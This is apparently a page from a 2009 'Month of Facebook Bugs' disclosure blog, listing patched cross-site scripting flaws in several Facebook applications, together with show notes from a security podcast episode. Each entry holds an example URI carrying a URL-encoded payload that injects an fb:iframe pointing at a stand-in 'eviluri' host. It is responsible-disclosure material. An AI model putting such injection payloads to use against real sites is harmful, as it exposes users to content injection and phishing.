FAXX Hack: Dogbook

Current Monthly Active Users: 711,503

Current Rank on Application Leaderboard: 159

Application Developer: Poolhouse

Responsiveness: I received no communication from the developers, but Facebook did. The hole was patched about a week after notification.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/dogbook/search/?name=%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Feviluri%2F%22%3E

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

FAXX Hack: myFarm

(This counts as Sunday’s FAXX Hack.)

Current Monthly Active Users: 945,452

Current Rank on Application Leaderboard: 121

Application Developer: playSocial & take(5)social

Responsiveness: I received no communication from the developers, but Facebook did. The hole was patched about a week after notification.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/farmgame/post.pS?id=%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Feviluri%2F%22%3E

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

Social Media Security Podcast 2 – Month of Facebook Bugs, What is XSS, Canadian Privacy Ruling

skullThis is the second episode of the Social Media Security Podcast recorded September 25, 2009.  This episode was hosted by Scott Wright, Tom Eston and our new co-host Kevin Johnson.  Below are the show notes, links to articles and news mentioned in the podcast:

  • Introducing our new co-host, Kevin Johnson.  Kevin is a Senior Security Analyst for InGuardians and is also an instructor for the SANS Institute, teaching both SEC504: Hacker Techniques, Exploits, and Incident Handling and SEC542: Web App Penetration Testing and Ethical Hacking courses.
  • Tom talks about the Month of Facebook Bugs (created by a security researcher called “theharmonyguy”) why this is important and how many vulnerable applications have been exploited and fixed so far.  Here is the list of top Facebook applications that Tom mentioned in the podcast.
  • Kevin gives a great non-technical overview of a web application vulnerability called Cross-site Scripting (XSS). Many of the Facebook applications we found in the “month of Facebook bugs” were vulnerable to XSS.  Kevin describes what XSS is, how it works and how dangerous this vulnerability is to social networking applications like Facebook.
  • Scott talks about the recent ruling regarding the Canadian Federal Privacy Commissioner vs. Facebook.  This ruling in Canada has created wide reaching changes to privacy and the way applications function within Facebook.
  • Scott also included a brief interview with the Canadian Privacy Commissioner’s Office about this recent Facebook ruling.
  • Tom has updated his Facebook Privacy & Security Guide.  You can download the latest version here.

Please send any show feedback to feedback [aT] socialmediasecurity.com or comment below.  You can also call our voice mail box at 1-613-693-0997 if you have a question for our Q&A section on the next episode.  You can also subscribe to the podcast now in iTunes! Thanks for listening!

FAXX Hack: People I Love!

Current Monthly Active Users: 986,796

Current Rank on Application Leaderboard: 119

Application Developer: Chad Morovitz

Responsiveness: I received no communication from the developers, but Facebook did. The hole was patched about a week after notification.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/dd832a5e70919175222a209559b89f4b/browse.php?m=n%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Feviluri%2F%22%3E&p=1&process=1

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

FAXX Hack: Photos I Love!

Current Monthly Active Users: 1,100,267

Current Rank on Application Leaderboard: 113

Application Developer: PhotosILove

Responsiveness: About a week after notification the hole remained live, but I checked back with Facebook and things got patched up.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/photosilove/browse.php?m=u&user=%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Feviluri%2F%22%3E

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

FAXX Hack: Death’s Time

Current Monthly Active Users: 11,802,383

Current Rank on Application Leaderboard: 16

Application Developer: 3happybytes

Responsiveness: I received no communication at first from the developers, but Facebook did. The hole was patched about a week after notification. After patching, the developer get in touch to confirm the fix.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/death-time/result.php?dia=1&anio=1991&mes=1%22%2F%3E%3C%2Fa%3E%3C%2Fp%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2FEVILURI%2F%22%3E

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

FAXX Hack: Willy’s Sweet Shop

Facebook Verified Application

Current Monthly Active Users: 853,598

Current Rank on Application Leaderboard: 136

Application Developer: Mob Science

Responsiveness: Facebook has been in touch with the developers, and today (about a week after notification) they issued a patch.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/ochristmastree/?id=%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Feviluri%2F%22%3E

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

FAXX Hack: Trazzler

Facebook Verified Application

Current Monthly Active Users: 5,448

Current Rank on Application Leaderboard: 2,833

Application Developer: Trazzler

Responsiveness: The developers at Trazzler have been responsive, and I’ve been working with them to try and get the hole patched. I was honestly a little disappointed by the information they got from Facebook about the hole, but that’s for another post.

Vulnerability Status: Unpatched Patched Sep. 24

Example URI: http://apps.new.facebook.com/trazzler/ajax/browse_navigation/?browse-search=%3Cfb%3Aiframe+src%3D’http%3A%2F%2FEVILURI%2F’%3E

Notes: See the leaderboard rank of Trazzler? I chose to check it after looking at the list of Facebook Verified Applications, which means AppData lists around 2,800 applications I haven’t checked which have higher MAU than Trazzler. This Month of Facebook Bugs only begins to scratch the surface of Facebook applications.

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

1 12 13 14 15 16 28